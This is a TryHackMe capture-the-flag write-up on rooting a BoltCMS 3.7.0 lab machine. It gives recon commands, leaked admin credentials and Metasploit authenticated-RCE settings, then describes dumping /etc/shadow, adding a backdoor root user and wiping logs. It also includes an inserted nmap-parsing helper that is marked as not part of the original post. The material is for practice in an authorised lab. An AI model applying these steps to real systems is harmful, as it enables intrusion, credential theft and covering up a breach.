TryHackMe: Bolt Write-up

hamby
5 min read · Aug 8, 2022

A machine that highlights the authenticated remote code execution vulnerability in BoltCMS 3.7.0. This machine is a pretty straightforward box, since exploiting it with the Metasploit module gives us a root shell on the machine. Let’s hop straight into it!

IP: 10.10.143.4*
Difficulty: Easy
Machine OS: Linux
Learning Platform: tryhackme.com
Created by: 0x9747
  • Note: IP address may vary.

Reconnaissance

Scoping and Preparation

Connect to the TryHackMe OpenVPN server using:

  • sudo openvpn {PATH_TO_OVPN_FILE}

Run our recon tools such as nmap and gobuster.

I ran nmap twice: first to get the specific ports that are open, so that I could do the OS and version enumeration faster, since I already had the open ports I needed.

1st Nmap command used: sudo nmap -T4 -p- -oN [FILENAME] [IP]

2nd Nmap command used: sudo nmap -A -T4 -p[OPEN_PORTS_GOT_ON_1ST_NMAP_SCAN] -oN [FILENAME] [IP]
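As an added example (not part of the original post), a small POSIX shell helper that pulls the open ports out of the first scan's -oN file and prints the second-pass command with them filled into -p; the nmap output, target IP and file names below are constructed samples.

```shell
#!/bin/sh
# Constructed sample of an nmap -oN (normal output) file from a -p- scan.
SAMPLE_NMAP_OUT='# Nmap 7.92 scan initiated Mon Aug  8 10:00:00 2022 as: nmap -T4 -p- -oN ports.txt 10.10.143.4
Nmap scan report for 10.10.143.4
Host is up (0.045s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt
# Nmap done at Mon Aug  8 10:00:12 2022 -- 1 IP address (1 host up) scanned in 12.34 seconds'

# open_ports: read nmap -oN text on stdin and print a comma-separated list
# of ports whose state is exactly "open" (e.g. 22,80,8000), ready for -p.
# Lines such as "open|filtered" or the PORT/STATE header are skipped.
open_ports() {
    awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
             split($1, p, "/")
             ports = ports (n++ ? "," : "") p[1]
         }
         END { print ports }'
}

# next_scan_cmd FILE TARGET OUTFILE: print (do not run) the second-pass
# command for the ports found in FILE; fails if no open port was found.
next_scan_cmd() {
    ports=$(open_ports < "$1")
    [ -n "$ports" ] || { echo "no open ports found in $1" >&2; return 1; }
    printf 'sudo nmap -A -T4 -p%s -oN %s %s\n' "$ports" "$3" "$2"
}

# Demo on the constructed sample.
printf '%s\n' "$SAMPLE_NMAP_OUT" | open_ports
```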

Gobuster command used: gobuster dir -u http://[IP] -w [WORDLIST] -o [FILENAME FOR OUTPUT] -t [NUMBER OF THREADS]

External Enumeration

Preliminary Enumeration via nmap

Table 1.1: nmap Results Summary

nmap result summary.
partial nmap result summary.

Ubuntu Version: Ubuntu Bionic

Web Enumeration

Browsing through the HTTP service at port 80 gives us the default Apache page.

default page for Apache2

Let’s see what web technologies the web server uses. In this case, I use the browser extension Wappalyzer.

web technologies used by HTTP service at port 80.

Nothing new came up from checking the web technologies with Wappalyzer. Let’s look at the HTTP service on port 8000.

webpage at port 8000 that includes possible credentials.

Scrolling through the webpage (as shown in the image above), we see a post from Jake giving away the password of the admin account.

Let’s see the web technologies used by the HTTP server on port 8000.

Scrolling further, we can also see that Jake shares the username of his admin account, which is bolt.

username in the web server is bolt.
web technologies in port 8000.

We can see that the HTTP server on port 8000 is running BoltCMS. We will look at the BoltCMS documentation next, since we now have possible credentials for the CMS.

Searching for "bolt cms login page" on Google gives us the documentation for BoltCMS.

BoltCMS documentation about the location of login page.

Using the information from the BoltCMS documentation, we type in the URL where the login page resides.

trying the credentials found on posts in the web server.

Submitting the credentials, we are now logged in as admin in BoltCMS, and we can also see the BoltCMS version. We can check whether that specific version has known vulnerabilities.

logged in as bolt.

Exploitation

Web Server Exploitation

We now have a valid login for the webpage and the BoltCMS version. We can check whether the running version of BoltCMS has known vulnerabilities using the tool searchsploit.

Command used: searchsploit bolt

BoltCMS exploits as per searchsploit.

We can see that there is an authenticated RCE (Remote Code Execution) for BoltCMS v3.7.0. We can examine it further with searchsploit by using the -x flag and copying the path shown in the previous searchsploit output.

Command used: searchsploit -x php/webapps/48296.py

The command above shows the exploit code at the path given by searchsploit.

Based on the TryHackMe question, it is suggested that we use the Metasploit module for our exploit.

Metasploit module for BoltCMS 3.7.0 — Authenticated Remote Code Execution.

We will use the exploit/unix/webapp/bolt_authenticated_rce module for our exploit. To quickly select this module, type use 0.

We just need to set LHOST, RHOST, USERNAME and PASSWORD to run the exploit module successfully. The commands used are shown below (press the ENTER key after every command). Lastly, type run, or if you want to be a cool kid, type exploit.

set LHOST [YOUR_THM_IP]
set RHOST [VICTIM_MACHINE_IP]
set USERNAME bolt
set PASSWORD boltadmin123
run

Table 1.2: Credentials

credentials found.

Post-Exploitation

Internal Enumeration

Table 1.3: Checklist for Linux Internal Enumeration

mini checklist for linux privilege escalation.

Note: For more information about the commands, look here.

Tip: When nothing else makes sense, try LinPEAS (winPEAS for Windows machines).

We are now logged in as root.

Using the Metasploit module gives us a root shell.

We don’t need to escalate our privileges, since we are already root.

To find the flag, use the find binary:

Command used: find / -type f -name 'flag.*' 2>/dev/null

(The redirection must sit outside the quotes; with 2>/dev/null inside the -name pattern, find looks for a file literally named "flag.* 2>/dev/null" and permission errors are not silenced.)

finding the flag using find binary.

Data Exfiltration

We also managed to get the confidential info from the machine and dumped it into a file named Confidential.md (it includes the /etc/shadow contents and the root flag).

STATUS: ROOTED

The next two steps are not necessary for completing the machine, but they complete the 5 Phases of Penetration Testing.

Persistence

Copied the /etc/shadow file for user identification and their passwords.

Added another root user for easy access.

Clearing Tracks

Removed all logs and footprints to reduce the risk of the breach being exposed to the security administrator.

Status: Finished

Feel free to reach out if there is something wrong with the above post. Feedback is also appreciated! :D

Donation Box

Not required but appreciated! :D
